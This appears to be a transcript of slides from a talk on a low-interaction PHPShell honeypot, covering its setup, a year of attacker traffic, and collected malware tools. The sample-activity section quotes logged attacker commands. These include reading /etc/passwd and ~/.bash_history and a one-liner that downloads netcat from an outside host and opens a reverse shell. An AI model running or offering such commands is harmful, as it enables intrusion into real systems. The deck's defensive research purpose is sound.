Post on 31-Mar-2020
transcript
Tales from the Honeypot
Jim Owens
Overview Definitions Setup & deployment Activity: levels & types Tools
Sources Types Samples Analysis
Static analysis Dynamic Analysis
Conclusions
Definitions
Honeypot Real or virtual computer system Appears vulnerable to attack Exists to be exploited (and studied)
Low-interaction honeypot Emulates a vulnerable system Designed to fool attackers for a short time Primary goal is to collect malware tools for
analysis
Setup
PHPShell 1.7 “A shell wrapped in a PHP script…” v1.7 has well-known security issues PHPHOP version
Requires Apache and PHP support Provides a thin layer of functionality Logs activity to text files Downloads malware tools in background (or not)
Setup
Setup PHPHOP logging
IP address hostname query string
pwd (present working directory) command
user agent referer
PHPHOP downloads wget or curl or lynx Downloaded files not accessible to attacker
Deployment
May require script modifications
Transparent links Create on popular pages
Drive search traffic to honeypot
Traffic (MySQL) database & browsing tool Supports sophisticated queries
Simplifies browsing of honeypot traffic
Activity: Oct '06 – Oct '07
10
/5
/2
00
6
11
/4
/2
00
6
11
/2
0/
20
06
12
/6
/2
00
6
12
/2
2/
20
06
1/
7/
20
07
1/
24
/2
00
7
2/
10
/2
00
7
2/
26
/2
00
7
3/
14
/2
00
7
3/
30
/2
00
7
4/
15
/2
00
7
5/
1/
20
07
5/
17
/2
00
7
6/
2/
20
07
6/
18
/2
00
7
7/
4/
20
07
7/
20
/2
00
7
8/
5/
20
07
8/
22
/2
00
7
9/
7/
20
07
9/
23
/2
00
7
10
/9
/2
00
7
0
12
3
4
5
6
7
89
10
11
12
13
14
15
1617
18
19
20
21
22
23
24
Total Hits by Distinct IP
Date
Dis
tin
ct I
Ps
Sample activity types
Curious Destructive Angry Friendly Efficient Guilty Stupid
CuriousSource IP: 88.73.7.239Date: 4/1/2007, 3pm(http://www.google.de/search?q=<"Enable stderr" filetypephp inurl"work_dir")
lscat /etc/passwduname -a
DestructiveSource IP: 201.132.96.174 Date: 4/12/2007, 4pm(http://www.diosdelared.com/foro/index.php?topic=224.15)
echo HACKED BY LaLo PaRa Ti YaReLi>index.php
AngrySource IP: 202.173.224.82Date: 2/15/2007, 7am
lssshsu/sbin/ifconfig/sbin/ifconfig/sbin/ifconfig...(600+ line script probing for vulnerable Web apps & files)...(22 more GETs for various documents actually on server)
FriendlySource IP: 62.129.172.74Date: 2/27/2007, 8am(http://www.google.fr/search?q=PHP Shell 1.7)
id && echo "hi honeypot"ls -al;pwdnetstat -nap --ipls /bin!!! :)cat ~/.bash_history
EfficientSource IP: 136.159.73.4 (ucalgary.ca)Date: 3/9/2007, 1pm
mkdir /var/tmp/...;wget -O /var/tmp/.../nc http://greatsploit.greatnow.com/nc;chmod 755 /var/tmp/.../nc;/var/tmp/.../nc -e /bin/sh 136.159.73.4 10883
GuiltySource IP: 161.139.212.82 (Universiti Teknologi Malaysia)Date: 8/22/2007, 4am(http://www.google.com.my/search?q=allinurlphpshell.php)
echo betik was here.. betik is innocent.. selamat bekerja>betik.txt
StupidSource IP: 68.250.150.179Date: 9/12/2007, 1pm(http://www.google.com/search?q=intitle:"PHP Shell *" &filetype:php)
shell_exec('sudo -u root -S command_goes_here < /home/$User/dir/dir/dir/passfile');
shell_exec("C:\\path\\to\\cmd.exe /c C:\\batchfile.cmd");
Tools
Sources Types
Tools: Sources
Free hosting sites ISP sites “Hacker”/personal sites Malware repositories
Packet storm Milw0rm
Regular old (hacked) Web sites
Tools: Types IRC bot clients Phishing sites (Paypal, Bank of America) Shells (r57, c99, many variants) DDOS tools Backdoors Root exploits Bouncers (psyBNC) Internet game server (Nexuiz) You name it!
Tools: Samples
Backdoor programs bd.py m0rtix.c
Local root exploit prctl.sh
Web site defacement pink-bebek.jpg
Tools: Analysis
Static analysisTechniques that don’t require actually running the tool Review source, if available Identify file type, for binaries Viewing internal strings; Web search may yield
source
Dynamic analysisTechniques used while the tool is running Best done in an instrumented “sandbox”
environment Track network connections attempted Trace system calls and files accessed or created
Conclusions
Low-interaction honeypots: Require little effort to set up/maintain Prove effective in drawing traffic,
even a year after deployment Provide valuable insights into
attackers’ methods and motivations, as well as moments of levity
Collect malware tools for later analysis